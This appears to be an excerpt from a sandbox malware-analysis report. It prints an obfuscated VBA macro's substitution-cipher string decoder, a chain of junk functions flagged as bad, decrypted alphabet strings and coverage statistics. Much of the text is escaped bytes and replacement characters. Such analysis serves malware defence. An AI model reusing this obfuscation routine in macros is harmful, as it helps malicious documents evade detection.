?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","v") -> 47 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","b") -> 27 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 95 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","h") -> 33 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 96 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 93 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5",":") -> 0 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","/") -> 0 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","w") -> 48 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 90 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 86 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","m") -> 38 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 91 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 87 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 92 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 88 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 98 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","g") -> 32 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","d") -> 29 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 89 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 99 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","j") -> 35 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","q") -> 42 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 94 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","z") -> 51 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","k") -> 36 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","l") -> 37

                                              Mid

                                              Mid

                                              Mid

                                              StringsDecrypted Strings
                                              " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xbf\xa1\xb2\xb3\xc0\xc1\xc2\xc3\xc4\xc5\xd2\xd3\xd4\xd5\xd6\xd9\xdb\xdc\xe0\xe1\xe2\xe3\xe4\xe5\xd8\xb6\xa7\xda\xa5"
                                              " \xbf\xa1@#$%^&*()_+|01\xb2\xb3456789\xc0b\xc1d\xc2\xc3gh\xc4jklm\xc5\xd2\xd3q\xd4\xd5\xd6\xd9vw\xdb\xdcz.,-~A\xe0\xe1\xe2\xe3FGH\xe4JK\xe5MN\xd8\xb6QR\xa7T\xdaVWX\xa5Z?!23acefinoprstuxyBCDEILOPSUY"
                                              LineInstructionMeta Information
                                              70

                                              Public Function \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6(\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2)

                                              71

                                              \xac\xaa\xbc\xb8\xbc\xa1\xbf\xb7\xaf\xac\xaa\xbf\xa1\xaf\xb4\xa6\xa8\xaf\xa3\xa8\xaf\xa6\xb0\xaa\xaa\xbd\xb5\xa9\xb4\xbb\xab\xb9\xac\xbb\xbd\xa3\xa9\xab\xaf\xa4\xa6\xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2 = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xbf\xa1\xb2\xb3\xc0\xc1\xc2\xc3\xc4\xc5\xd2\xd3\xd4\xd5\xd6\xd9\xdb\xdc\xe0\xe1\xe2\xe3\xe4\xe5\xd8\xb6\xa7\xda\xa5"

                                              72

                                              \xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7 = " \xbf\xa1@#$%^&*()_+|01\xb2\xb3456789\xc0b\xc1d\xc2\xc3gh\xc4jklm\xc5\xd2\xd3q\xd4\xd5\xd6\xd9vw\xdb\xdcz.,-~A\xe0\xe1\xe2\xe3FGH\xe4JK\xe5MN\xd8\xb6QR\xa7T\xdaVWX\xa5Z?!23acefinoprstuxyBCDEILOPSUY"

                                              73

                                              For w = 1 To Len(\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2)

                                              Len("\V\xfffdM\xfffd\xfffdV.vb\xfffd") -> 12

                                              executed
                                              74

                                              \xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2\xa4\xb3\xbd\xbd\xa5\xa4\xb2\xaf\xb5\xa8\xb0\xab\xa7\xb5\xb9\xb3\xa9\xac\xab\xac\xaa\xbc\xb8\xbc\xa1\xbf\xb7\xaf = InStr(\xac\xaa\xbc\xb8\xbc\xa1\xbf\xb7\xaf\xac\xaa\xbf\xa1\xaf\xb4\xa6\xa8\xaf\xa3\xa8\xaf\xa6\xb0\xaa\xaa\xbd\xb5\xa9\xb4\xbb\xab\xb9\xac\xbb\xbd\xa3\xa9\xab\xaf\xa4\xa6\xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2, Mid(\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2, w, 1))

                                              InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\") -> 0

                                              Mid

                                              executed
                                              75

                                              If \xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2\xa4\xb3\xbd\xbd\xa5\xa4\xb2\xaf\xb5\xa8\xb0\xab\xa7\xb5\xb9\xb3\xa9\xac\xab\xac\xaa\xbc\xb8\xbc\xa1\xbf\xb7\xaf > 0 Then

                                              76

                                              \xac\xaa\xbf\xa1\xaf\xb4\xa6\xa8\xaf\xa3\xa8\xaf\xa6\xb0\xaa\xaa\xbd\xb5\xa9\xb4\xbb\xab\xb9\xac\xbb\xbd\xa3\xa9\xab\xaf\xa4\xa6\xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe = Mid(\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7, \xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2\xa4\xb3\xbd\xbd\xa5\xa4\xb2\xaf\xb5\xa8\xb0\xab\xa7\xb5\xb9\xb3\xa9\xac\xab\xac\xaa\xbc\xb8\xbc\xa1\xbf\xb7\xaf, 1)

                                              Mid

                                              77

                                              \xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8 = \xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8 + \xac\xaa\xbf\xa1\xaf\xb4\xa6\xa8\xaf\xa3\xa8\xaf\xa6\xb0\xaa\xaa\xbd\xb5\xa9\xb4\xbb\xab\xb9\xac\xbb\xbd\xa3\xa9\xab\xaf\xa4\xa6\xb8\xaa\xb5\xb8\xb6\xbd\xbe\xa7\xb6\xb6\xbc\xae\xbe\xb2\xba\xa9\xb3\xbe\xbb\xb5\xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe

                                              78

                                              Else

                                              79

                                              \xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8 = \xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8 + Mid(\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8\xbb\xb3\xb7\xbb\xaa\xb6\xb5\xbe\xb9\xba\xb6\xaa\xb7\xa6\xa7\xbd\xb6\xac\xbc\xb7\xbf\xa9\xbb\xbb\xb4\xb4\xab\xa6\xb2\xac\xa1\xae\xb0\xbb\xac\xbb\xba\xb7\xae\xbf\xa2\xab\xa5\xa2, w, 1)

                                              Mid

                                              80

                                              Endif

                                              81

                                              Next

                                              Len("\V\xfffdM\xfffd\xfffdV.vb\xfffd") -> 12

                                              executed
                                              82

                                              \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6 = \xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6\xa6\xba\xbf\xa8\xb8\xab\xb8\xa9\xb2\xae\xb2\xb9\xb5\xbf\xb6\xab\xba\xaf\xab\xae\xa7\xb4\xbc\xaf\xae\xa8\xb7\xb4\xaa\xa9\xba\xbe\xa6\xa1\xa7\xbc\xb9\xb9\xb8

                                              83

                                              End Function

                                              Function

                                              xghxfcBropnAPIs: 2, Strings: 0, Number of lines: 19, Relevance: 2.519

                                              APIsMeta Information

                                              fthdsthdfAxgfhhd

                                              fthdsthdfAxgfhhd

                                              LineInstructionMeta Information
                                              49

                                              Function xghxfcBropn() as Byte

                                              50

                                              xghxfcBropn = 111

                                              51

                                              Call xdfzfgxdb()

                                              52

                                              Function xdfzfgxdb() As Boolean ' BAD !

                                              53

                                              xdfzfgxdb = False

                                              54

                                              Call Zoorroom()

                                              55

                                              Function Zoorroom() As Double ' BAD !

                                              56

                                              Zoorroom = Zoorroom

                                              57

                                              Call hormmmom()

                                              58

                                              Function hormmmom() As Variant ' BAD !

                                              59

                                              hormmmom = timong

                                              60

                                              Function timong() As Long ' BAD !

                                              61

                                              timong = fdyhjdfyfghjfhygyjfyjdfjfgyjfgjfgtujxftgh

                                              62

                                              fdyhjdfyfghjfhygyjfyjdfjfgyjfgjfgtujxftgh As Byte ' BAD !

                                              63

                                              fdyhjdfyfghjfhygyjfyjdfjfgyjfgjfgtujxftgh = 100

                                              64

                                              Call fthdsthdfAxgfhhd()

                                              fthdsthdfAxgfhhd

                                              65

                                              Function fthdsthdfAxgfhhd() ' BAD !

                                              66

                                              fthdsthdfAxgfhhd

                                              fthdsthdfAxgfhhd

                                              67

                                              End Function

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:60.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:95.2%
                                                Total number of Nodes:63
                                                Total number of Limit Nodes:0
